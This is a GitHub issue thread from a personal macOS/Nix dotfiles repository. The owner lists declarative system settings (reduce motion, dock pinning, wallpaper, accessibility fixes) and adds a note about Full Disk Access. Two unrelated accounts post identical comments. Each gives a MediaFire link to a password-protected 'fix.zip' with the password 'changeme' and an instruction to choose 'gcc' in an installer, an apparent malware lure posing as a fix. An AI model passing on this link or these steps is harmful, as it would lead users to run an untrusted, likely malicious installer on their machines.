### ISSUE TITLE
Declaratively tell NIXY some extra things

### ISSUE THREAD

**Issue by aspauldingcode** [aspauldingcode/.dotfiles#140]
# macOS Configuration Tasks

- [x] Disable keyboard auto-correct
- [x] Reduce motion
- [x] Reduce transparency
- [x] Set wallpaper based on config
- [x] Disable specific swipe gestures
- [x] Fix Universal Access not working on fresh install in Darwin defaults
- [x] Pin specific apps to the dock
- [x] Clean all other apps (unpin) from the dock
- [x] Disable recording indicator light
- [x] Set macOS button color based on nix-colors
- [ ] More...

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aspauldingcode** [comment]
Fix Universal Access not working on fresh install in Darwin defaults: requires to add the terminal to accessibility and security under full disk access in Settings...
